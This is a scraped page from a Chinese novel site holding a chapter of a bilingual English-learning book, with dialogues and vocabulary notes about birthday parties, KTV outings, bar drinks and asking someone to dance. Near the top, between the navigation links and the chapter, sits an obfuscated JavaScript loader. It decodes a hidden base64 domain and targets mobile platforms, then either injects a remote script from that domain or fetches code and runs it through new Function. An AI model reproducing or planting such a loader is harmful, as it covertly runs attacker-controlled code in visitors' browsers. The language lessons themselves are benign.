妙书阁小说

阅读记录  |   用户书架
上一页
目录 | 设置
下一章
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};

02 聚会(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

朱莉:蛋糕来了。

susan: i must first make a wish.

苏珊:我要先许个愿。

julie: but don&#039;t tell us, or the wish won&#039;t come true.

朱莉:但是别告诉我们哟,否则愿望就不会实现了。

karl: oh, the candles all went out. i wish your dreams will come to fruition.

卡尔:噢,蜡烛全吹灭了。希望你的愿望能实现。

susan: thank you. now let&#039;s enjoy the cake.

苏珊:谢谢。现在我们一起吃蛋糕吧。

notes

1. thoughtful [&#039;θ?:tf?l] adj. 深思的;体贴的

2. make a wish 许愿

3. come true(预言、期望等)实现,成为事实

4. go out 外出;过时;(潮)退;(灯)熄;终止;公布

5. fruition [fru:&#039;i??n] n. 取得成果,成就;实现,完成

小贴士

如何拒绝聚会上的“劝吃劝喝”:

1. sorry, i&#039;m not used to drinking.

我不喝酒。

2. i have quit drinking.

我已经戒酒了。

3. i&#039;m on diet.

我在节食。

4. i have had quite enough. i can&#039;t take another bite.

我吃撑了,一口都吃不下了。

5. no, thank you. i&#039;m really up.

不用了,谢谢。我真的吃饱了。

6. i cannot drink because i will have to drive back home after the party.

我不能喝酒,聚会结束后我还得开车回家呢。

唱歌就来ktv

dialogue

tom and karl are discussing how to treat their partners.

汤姆和卡尔正在讨论怎么犒劳他们的搭档。

tom: the project was a big success. now it&#039;s finished, all credit goes to our coworkers.

汤姆:这个项目很成功。现在已经完成了,这都归功于我们的同事。

karl: yeah, i think we should take them out to celebrate this weekend.

卡尔:是的,我觉得这个周末应该带他们去庆祝一下。

tom: do you have any good ideas?

汤姆:你有什么好主意吗?

karl: we could invite them all to dinner at the bear restaurant, then come to a pub for drinks.

卡尔:我们可以邀请他们去比尔饭店聚餐,然后到酒吧喝点东西。

tom: good idea. but i have another suggestion. why don&#039;t we go to a ktv and sing?

汤姆:好主意。但是我还有个提议。为什么不去ktv唱歌?

karl: a ktv? i have never been to one.

卡尔:去ktv?我从来没去过。

tom: never? really? i&#039;m surprised.

汤姆:没去过?真的?我很惊讶。

karl: i don&#039;t like singing at all, plus i am tone-deaf. are you good at singing?

卡尔:我一点也不喜欢唱歌,而且我五音不全。你唱歌拿手吗?

tom: just so so. but you know many employees in our company feel that going to a ktv would be fun.

汤姆:还可以。但是你知道吗?我们的很多同事都觉得去ktv 会很好玩。

karl: okay, let&#039;s go to the best ktv of this city after dinner. i can be a good listener.

卡尔:好吧,那我们聚餐后就去全市最好的卡拉ok厅唱歌去。我可是一个很好的听众哦。

notes

1. credit [&#039;kredit] v. 归功于;相信;记入贷方;n. 贷款;功劳

2. pub [p?b] n. 酒吧,酒馆

3. tone-deaf [&#039;t?un?def] adj. 音盲的,五音不全的

小贴士

1. i&#039;d like to request a song. please let me look through the sing list.

我想点首歌。请让我看一下点歌单。

2. let&#039;s sing a duet.

来个二重唱吧。

3. my singing is out of tune.

我唱歌总跑调儿。

也可以这样说:

i have no ear for music.

4. hey, jerry, what&#039;s your karaoke specialty?

嘿,杰瑞,你唱卡拉ok有什么拿手的歌吗?

也可以这样说:

hey, jerry, what&#039;s your best song?

5. we can go to a ktv because we need a distraction from the busy work.

我们可以去ktv,因为在繁忙工作之余我们也需要娱乐。

6. i can&#039;t keep track of this song.

我跟不上这首歌的节奏。

也可以这样说:

i can&#039;t keep up with this song.

酒吧里的狂欢

dialogue

jerry got a promotion just now. he invited his colleagues to have a celebration.

杰瑞刚刚得到升职。他邀请同事们到酒吧庆祝。

bartender: can i get you something to drink?

酒保:请问要不要喝点什么?

jerry: sure. please give us a dozen of dark beers first.

杰瑞:当然。请给我们来一打黑啤。

bartender: enjoy yourselves.

酒保:请尽情享用。

jerry: thank you.

杰瑞:谢谢。

susan: may i propose a toast to jerry&#039;s promotion! congratulations, jerry.

苏珊:我提议为杰瑞的提升干杯!祝贺你,杰瑞。

jerry: thank you! cheers! please have a ball tonight. it&#039;s my treat.

杰瑞:谢谢!干杯!大家今晚尽情地狂欢吧,我请客。

susan: of course you would. now you are our executive.

苏珊:你当然要请客。现在你可是我们的主管。

jerry: it&#039;s due to your help and cooperation. what else would you like to drink?

杰瑞:这都归功于你们的帮助和协作。你们还要喝点什么?

susan: give me a scotch on the rocks.

苏珊:请给我来杯加冰块的苏格兰威士忌酒。

jerry: no problem. what about you, tom?

杰瑞:没问题。你呢,汤姆?

tom: a tequila sunrise will do. thank you.

汤姆:一杯龙舌兰日出好了。谢谢。

jerry: you are welcome. please don&#039;t just sit here and drink. look over there. the dance floor is already packed with people. want to go and join them?

杰瑞:你太客气了。不要只坐在这喝酒啊。看那边,舞池里已经挤满了人了。想去和他们一起跳吗?

tom: of course. let&#039;s go.

汤姆:当然了。我们去吧。

notes

1. dark beer 黑啤酒

2. have a ball 狂欢

3. scotch [sk?t?] adj. 苏格兰(人,语)的;节俭的,小气的;n. 苏格兰人;苏格兰语;苏格兰威士忌酒

4. on the rocks 加冰块;触礁

5. tequila [t?&#039;ki:l?] n. 蒸馏酒,龙舌兰酒

6. be packed with 塞满;挤满

小贴士

外国名酒小常识

1. cocktail(鸡尾酒)是一种量少而冰镇的酒,比如highball, martini和margarita都由一种烈性酒(liquor)和甜酒(liqueur)调制而成。

2. vodka(伏特加)以谷物或马铃薯为原料,经过蒸馏和活性炭过滤,使酒质更加晶莹澄澈,无色且清淡爽口,给人的感觉是不甜、不苦、不涩,只有烈焰般的刺激,这是伏特加酒独具一格的特色。

3. rum(莱姆酒)也叫糖酒,它以蔗糖作原料,先制成糖蜜,然后再经发酵、发馏,在橡木桶中储存3年以上而成。酒液有white, amber, brown即白、琥珀色和棕色三种颜色。其中属amber rum 最贵,因为其加工的工艺较其他更复杂。

4. gin(金酒)又名杜松子酒,是世界第一大类的烈酒。

5. scotch whisky(苏格兰威士忌)用经过干燥,泥炭熏焙产生独特香味的大麦芽作酵造原料制成。贮存15年到20年的酒色泽棕黄带红,清澈透亮,气味焦香,带有浓烈的烟味,为最优质的成品酒。

舞会怎能没有舞伴

dialogue

tony wants to invite his friend maggie to be his partner.

托尼想邀请他的朋友麦琪做他的舞伴。

tony: hi, maggie. i&#039;m so glad to meet you. i need your help.

托尼:嗨,麦琪。真高兴见到你。我需要你的帮忙。

maggie: how can i help you?

麦琪:我能帮你什么?

tony: our company will hold a party this saturday evening. could you be my dancing partner?

托尼:我们公司要在这周六晚上举行一场舞会。你能做我的舞伴吗?

maggie: i&#039;d like to, but i&#039;m afraid i&#039;m not much of a dancer.

麦琪:我很乐意,但是我不是很会跳舞。

tony: don&#039;t worry. i can teach you. which dance do you like best?

托尼:不用担心,我会教你的。你最喜欢哪种舞蹈?

maggie: i like tango best. it&#039;s such a beautiful dance, but i can&#039;t do it well.

麦琪:我最喜欢探戈。探戈舞姿很优雅,但是我跳得不是很好。

tony: are you free now? may i invite you for a dance? just a practice.

托尼:你现在有时间吗?我能请你跳支舞吗?只是个小练习。

maggie: ok, what should i do? i&#039;m afraid that i&#039;ll step on your foot.

麦琪:好吧,我该怎么做?我担心会踩到你的脚。

tony: no, you won&#039;t. let&#039;s begin. you just follow me.

托尼:不,你不会的。我们开始吧。跟着我的节拍走。

maggie: do you often dance? you are dancing so well.

麦琪:你经常跳舞吗?你跳得很棒。

tony: yes, because dancing is a good way to relax. you did it excellently. you have a talent for it.

托尼:是啊,跳舞是放松的好方式。你做得很好,很有跳舞的天分。

notes

1. tango [&#039;t??g?u] n. 探戈舞,探戈舞曲;v. 跳探戈舞

2. step on 踩,踏

3. talent [&#039;t?l?nt] n. 天资,才能;人才

小贴士

1. may i have the pleasure of the first dance?

我能有幸和你跳第一支舞吗?

也可以这样说:

may i have the first dance?

2. may i invite you for the next dance?

我可以请你跳下一支舞吗?

3. i don&#039;t feel like dancing any more. i&#039;m tired now.

我不想再跳舞了。我现在累了。

4. look, that girl dances like an animal.

看,那个女孩跳舞跳得很疯狂。

5. she has mania for dancing. she has been dancing with others all the evening.

她是个舞迷,整个晚上都在跳舞。

6. oh, i admire your gracefulness. can you teach me how to dance?

噢,我欣赏你的优美舞姿。你能教我跳舞吗?

7. i&#039;m sorry. i think i&#039;ll sit out the next dance.

不好意思,我想坐一会儿,等过了下只舞吧。

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间